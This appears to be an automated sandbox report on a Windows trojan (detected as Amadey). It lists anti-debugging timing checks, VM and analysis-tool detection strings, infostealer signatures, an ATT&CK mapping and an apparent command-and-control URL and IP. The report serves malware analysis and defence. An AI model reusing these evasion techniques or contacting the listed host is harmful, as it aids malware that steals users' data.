Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 775138E second address: 77513AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esi+14h] 0x0000000a pushad 0x0000000b jmp 00007F6FA452481Dh 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 77513AA second address: 775140B instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F6FA52293BCh 0x00000008 xor ch, FFFFFF88h 0x0000000b jmp 00007F6FA52293BBh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 popad 0x00000014 mov dword ptr [edx+14h], eax 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a push edi 0x0000001b pop esi 0x0000001c pushfd 0x0000001d jmp 00007F6FA52293C7h 0x00000022 sub cx, BB7Eh 0x00000027 jmp 00007F6FA52293C9h 0x0000002c popfd 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 775140B second address: 775144B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, ebx 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esi+18h] 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F6FA4524825h 0x00000014 sbb eax, 2CB66066h 0x0000001a jmp 00007F6FA4524821h 0x0000001f popfd 0x00000020 push eax 0x00000021 push edx 0x00000022 mov dh, ah 0x00000024 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 775144B second address: 7751469 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [edx+18h], eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F6FA52293C2h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 7751469 second address: 7751494 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, 32E4h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esi+1Ch] 0x0000000d jmp 00007F6FA4524826h 0x00000012 mov dword ptr [edx+1Ch], eax 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 7751494 second address: 775149D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov bx, D5AEh 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 775149D second address: 7751524 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA4524824h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+20h] 0x0000000c jmp 00007F6FA4524820h 0x00000011 mov dword ptr [edx+20h], eax 0x00000014 jmp 00007F6FA4524820h 0x00000019 mov eax, dword ptr [esi+24h] 0x0000001c pushad 0x0000001d pushfd 0x0000001e jmp 00007F6FA452481Dh 0x00000023 xor ax, 8F46h 0x00000028 jmp 00007F6FA4524821h 0x0000002d popfd 0x0000002e popad 0x0000002f mov dword ptr [edx+24h], eax 0x00000032 pushad 0x00000033 mov esi, 0EB54293h 0x00000038 mov ch, 74h 0x0000003a popad 0x0000003b mov eax, dword ptr [esi+28h] 0x0000003e push eax 0x0000003f push edx 0x00000040 jmp 00007F6FA452481Eh 0x00000045 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 7751524 second address: 775155E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F6FA52293C1h 0x00000009 jmp 00007F6FA52293BBh 0x0000000e popfd 0x0000000f movzx eax, di 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 mov dword ptr [edx+28h], eax 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F6FA52293BEh 0x0000001f rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 775155E second address: 7751570 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6FA452481Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 7751570 second address: 77515ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ecx, dword ptr [esi+2Ch] 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F6FA52293BDh 0x00000012 add esi, 5FD214C6h 0x00000018 jmp 00007F6FA52293C1h 0x0000001d popfd 0x0000001e call 00007F6FA52293C0h 0x00000023 pushfd 0x00000024 jmp 00007F6FA52293C2h 0x00000029 xor al, FFFFFF98h 0x0000002c jmp 00007F6FA52293BBh 0x00000031 popfd 0x00000032 pop esi 0x00000033 popad 0x00000034 mov dword ptr [edx+2Ch], ecx 0x00000037 push eax 0x00000038 push edx 0x00000039 jmp 00007F6FA52293C2h 0x0000003e rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 77515ED second address: 7751617 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA452481Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ax, word ptr [esi+30h] 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F6FA4524825h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 7751617 second address: 7751677 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA52293C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov word ptr [edx+30h], ax 0x0000000d jmp 00007F6FA52293BEh 0x00000012 mov ax, word ptr [esi+32h] 0x00000016 jmp 00007F6FA52293C0h 0x0000001b mov word ptr [edx+32h], ax 0x0000001f jmp 00007F6FA52293C0h 0x00000024 mov eax, dword ptr [esi+34h] 0x00000027 pushad 0x00000028 pushad 0x00000029 mov dx, si 0x0000002c mov di, ax 0x0000002f popad 0x00000030 push eax 0x00000031 push edx 0x00000032 mov dx, si 0x00000035 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 7751677 second address: 77516A5 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F6FA452481Eh 0x00000008 sbb eax, 5496DC78h 0x0000000e jmp 00007F6FA452481Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 mov dword ptr [edx+34h], eax 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 77516A5 second address: 7751701 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F6FA52293C0h 0x00000008 add ch, FFFFFFD8h 0x0000000b jmp 00007F6FA52293BBh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 mov dl, ah 0x00000015 popad 0x00000016 test ecx, 00000700h 0x0000001c jmp 00007F6FA52293BBh 0x00000021 jne 00007F7014A773F0h 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a mov eax, edi 0x0000002c call 00007F6FA52293C7h 0x00000031 pop ecx 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 7751701 second address: 7751707 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 7751707 second address: 775170B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 775170B second address: 7751763 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA4524820h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b or dword ptr [edx+38h], FFFFFFFFh 0x0000000f jmp 00007F6FA4524820h 0x00000014 or dword ptr [edx+3Ch], FFFFFFFFh 0x00000018 jmp 00007F6FA4524820h 0x0000001d or dword ptr [edx+40h], FFFFFFFFh 0x00000021 jmp 00007F6FA4524820h 0x00000026 pop esi 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 7751763 second address: 775176D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov edx, 5D7A366Eh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 775176D second address: 775177C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6FA452481Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 775177C second address: 7751780 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 7751780 second address: 775179B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F6FA4524820h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 775179B second address: 77517A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 7790C65 second address: 7790C77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6FA452481Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 774075D second address: 77407A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA52293BEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b jmp 00007F6FA52293BEh 0x00000010 pushad 0x00000011 mov eax, 36545287h 0x00000016 mov ax, 9023h 0x0000001a popad 0x0000001b popad 0x0000001c push eax 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F6FA52293C5h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 77407A4 second address: 77407DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F6FA452481Eh 0x0000000b popad 0x0000000c xchg eax, ebp 0x0000000d jmp 00007F6FA4524820h 0x00000012 mov ebp, esp 0x00000014 pushad 0x00000015 call 00007F6FA452481Eh 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 77407DD second address: 7740817 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushfd 0x00000006 jmp 00007F6FA52293C1h 0x0000000b or ecx, 1936BEE6h 0x00000011 jmp 00007F6FA52293C1h 0x00000016 popfd 0x00000017 popad 0x00000018 pop ebp 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c movsx edx, si 0x0000001f push ecx 0x00000020 pop edx 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 76E002C second address: 76E0044 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6FA4524824h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 76E0044 second address: 76E0048 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 76E0048 second address: 76E0079 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F6FA452481Eh 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F6FA4524827h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 76E0079 second address: 76E009E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA52293C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 76E009E second address: 76E00A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\HZhObFuFNe.exeSpecial instruction interceptor: First address: 136BA8A instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\HZhObFuFNe.exeSpecial instruction interceptor: First address: 1515310 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\HZhObFuFNe.exeSpecial instruction interceptor: First address: 136943E instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\HZhObFuFNe.exeSpecial instruction interceptor: First address: 159D98E instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
Source: C:\Users\user\Desktop\HZhObFuFNe.exeCode function: 0_2_00E09980 rdtsc 0_2_00E09980
Source: C:\Users\user\Desktop\HZhObFuFNe.exe TID: 7700Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\HZhObFuFNe.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Users\user\Desktop\HZhObFuFNe.exeCode function: 0_2_00C2255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_00C2255D
Source: C:\Users\user\Desktop\HZhObFuFNe.exeCode function: 0_2_00C229FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_00C229FF
Source: C:\Users\user\Desktop\HZhObFuFNe.exeCode function: 0_2_00C2255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_00C2255D
Source: HZhObFuFNe.exe, HZhObFuFNe.exe, 00000000.00000002.1497777692.00000000014F6000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: HZhObFuFNe.exe, 00000000.00000002.1497129879.00000000011FD000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: HZhObFuFNe.exeBinary or memory string: Hyper-V RAW
Source: HZhObFuFNe.exe, 00000000.00000002.1497129879.00000000011FD000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: HZhObFuFNe.exe, 00000000.00000003.1439286791.0000000006FD1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Y\MACHINE\SYSTEM\ControlSet001\Services\VBoxSFlS?
Source: HZhObFuFNe.exe, 00000000.00000002.1497777692.00000000014F6000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: HZhObFuFNe.exe, 00000000.00000002.1498770997.0000000001E19000.00000004.00000020.00020000.00000000.sdmp, HZhObFuFNe.exe, 00000000.00000003.1485992230.0000000001E13000.00000004.00000020.00020000.00000000.sdmp, HZhObFuFNe.exe, 00000000.00000003.1487061470.0000000001E18000.00000004.00000020.00020000.00000000.sdmp, HZhObFuFNe.exe, 00000000.00000003.1485916905.0000000001E09000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: HZhObFuFNe.exe, 00000000.00000003.1436271671.0000000001DB2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlld
Source: C:\Users\user\Desktop\HZhObFuFNe.exeSystem information queried: ModuleInformationJump to behavior
Source: C:\Users\user\Desktop\HZhObFuFNe.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\HZhObFuFNe.exeThread information set: HideFromDebuggerJump to behavior
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\Desktop\HZhObFuFNe.exeOpen window title or class name: regmonclass
Source: C:\Users\user\Desktop\HZhObFuFNe.exeOpen window title or class name: gbdyllo
Source: C:\Users\user\Desktop\HZhObFuFNe.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\HZhObFuFNe.exeOpen window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\HZhObFuFNe.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\HZhObFuFNe.exeOpen window title or class name: ollydbg
Source: C:\Users\user\Desktop\HZhObFuFNe.exeOpen window title or class name: filemonclass
Source: C:\Users\user\Desktop\HZhObFuFNe.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\HZhObFuFNe.exeFile opened: NTICE
Source: C:\Users\user\Desktop\HZhObFuFNe.exeFile opened: SICE
Source: C:\Users\user\Desktop\HZhObFuFNe.exeFile opened: SIWVID
Source: C:\Users\user\Desktop\HZhObFuFNe.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\HZhObFuFNe.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\HZhObFuFNe.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\HZhObFuFNe.exeCode function: 0_2_00E09980 rdtsc 0_2_00E09980
Source: HZhObFuFNe.exe, HZhObFuFNe.exe, 00000000.00000002.1497777692.00000000014F6000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: DProgram Manager
Source: C:\Users\user\Desktop\HZhObFuFNe.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\HZhObFuFNe.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\HZhObFuFNe.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\HZhObFuFNe.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: HZhObFuFNe.exe, 00000000.00000003.1399095536.0000000007A36000.00000004.00001000.00020000.00000000.sdmp, HZhObFuFNe.exe, 00000000.00000002.1497129879.00000000011FD000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: procmon.exe
Source: HZhObFuFNe.exe, 00000000.00000003.1399095536.0000000007A36000.00000004.00001000.00020000.00000000.sdmp, HZhObFuFNe.exe, 00000000.00000002.1497129879.00000000011FD000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: wireshark.exe

Stealing of Sensitive Information

barindex
Infostealer behavior detected
Source: Signature ResultsSignatures: Mutex created, HTTP post and idle behavior
Leaks process information
Source: global trafficTCP traffic: 192.168.2.9:49708 -> 185.121.15.192:80

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Command and Scripting Interpreter		1
DLL Side-Loading		1
Process Injection		24
Virtualization/Sandbox Evasion		OS Credential Dumping751
Security Software Discovery		1
Exploitation of Remote Services		11
Archive Collected Data		11
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading		1
Process Injection		LSASS Memory24
Virtualization/Sandbox Evasion		Remote Desktop Protocol1
Data from Local System		2
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Deobfuscate/Decode Files or Information		Security Account Manager13
Process Discovery		SMB/Windows Admin SharesData from Network Shared Drive3
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
Obfuscated Files or Information		NTDS1
Remote System Discovery		Distributed Component Object ModelInput Capture4
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
Software Packing		LSA Secrets1
File and Directory Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading		Cached Domain Credentials216
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
HZhObFuFNe.exe64%VirustotalBrowse
HZhObFuFNe.exe58%ReversingLabsWin32.Trojan.Amadey
HZhObFuFNe.exe100%AviraTR/Crypt.TPM.Gen
HZhObFuFNe.exe100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
home.fivetk5ht.top
185.121.15.192
truefalse
    		high
    httpbin.org
    		98.85.100.80
    		truefalse
      		high

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851false
        		high
        https://httpbin.org/ipfalse
          		high

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          https://curl.se/docs/hsts.htmlHZhObFuFNe.exe, 00000000.00000002.1497129879.00000000011FD000.00000040.00000001.01000000.00000003.sdmpfalse
            		high
            http://html4/loose.dtdHZhObFuFNe.exe, 00000000.00000003.1399095536.0000000007A36000.00000004.00001000.00020000.00000000.sdmp, HZhObFuFNe.exe, 00000000.00000002.1497129879.00000000011FD000.00000040.00000001.01000000.00000003.sdmpfalse
              		high
              https://curl.se/docs/alt-svc.html#HZhObFuFNe.exefalse
                		high
                http://home.fivetk5ht.top/zldPRHZhObFuFNe.exe, 00000000.00000003.1486137662.0000000001E01000.00000004.00000020.00020000.00000000.sdmpfalse
                  		unknown
                  http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpHZhObFuFNe.exe, 00000000.00000002.1497129879.00000000011FD000.00000040.00000001.01000000.00000003.sdmpfalse
                    		unknown
                    https://httpbin.org/ipbeforeHZhObFuFNe.exe, 00000000.00000003.1399095536.0000000007A36000.00000004.00001000.00020000.00000000.sdmp, HZhObFuFNe.exe, 00000000.00000002.1497129879.00000000011FD000.00000040.00000001.01000000.00000003.sdmpfalse
                      		high
                      https://curl.se/docs/http-cookies.htmlHZhObFuFNe.exe, HZhObFuFNe.exe, 00000000.00000003.1399095536.0000000007A36000.00000004.00001000.00020000.00000000.sdmp, HZhObFuFNe.exe, 00000000.00000002.1497129879.00000000011FD000.00000040.00000001.01000000.00000003.sdmpfalse
                        		high
                        http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv173457985135a1HZhObFuFNe.exe, 00000000.00000003.1487211287.0000000001DA8000.00000004.00000020.00020000.00000000.sdmp, HZhObFuFNe.exe, 00000000.00000003.1487134629.0000000001DA3000.00000004.00000020.00020000.00000000.sdmpfalse
                          		unknown
                          https://curl.se/docs/hsts.html#HZhObFuFNe.exefalse
                            		high
                            http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv17345798516963HZhObFuFNe.exe, 00000000.00000003.1487211287.0000000001DA8000.00000004.00000020.00020000.00000000.sdmp, HZhObFuFNe.exe, 00000000.00000003.1487578348.0000000001DAA000.00000004.00000020.00020000.00000000.sdmp, HZhObFuFNe.exe, 00000000.00000003.1487134629.0000000001DA3000.00000004.00000020.00020000.00000000.sdmp, HZhObFuFNe.exe, 00000000.00000002.1498497294.0000000001DAA000.00000004.00000020.00020000.00000000.sdmpfalse
                              		unknown
                              http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv17HZhObFuFNe.exe, 00000000.00000002.1497129879.00000000011FD000.00000040.00000001.01000000.00000003.sdmpfalse
                                		high
                                https://curl.se/docs/alt-svc.htmlHZhObFuFNe.exe, 00000000.00000002.1497129879.00000000011FD000.00000040.00000001.01000000.00000003.sdmpfalse
                                  		high
                                  http://.cssHZhObFuFNe.exe, 00000000.00000003.1399095536.0000000007A36000.00000004.00001000.00020000.00000000.sdmp, HZhObFuFNe.exe, 00000000.00000002.1497129879.00000000011FD000.00000040.00000001.01000000.00000003.sdmpfalse
                                    		high
                                    http://.jpgHZhObFuFNe.exe, 00000000.00000003.1399095536.0000000007A36000.00000004.00001000.00020000.00000000.sdmp, HZhObFuFNe.exe, 00000000.00000002.1497129879.00000000011FD000.00000040.00000001.01000000.00000003.sdmpfalse
                                      		high

                                      World Map of Contacted IPs

                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs

                                      Public IPs

                                      IPDomainCountryFlagASNASN NameMalicious
                                      185.121.15.192
                                      		home.fivetk5ht.topSpain
                                      		207046REDSERVICIOESfalse
                                      98.85.100.80
                                      		httpbin.orgUnited States
                                      		11351TWC-11351-NORTHEASTUSfalse

                                      General Information

                                      Joe Sandbox version:41.0.0 Charoite
                                      Analysis ID:1578913
                                      Start date and time:2024-12-20 16:34:25 +01:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 4m 49s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                      Number of analysed new started processes analysed:5
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
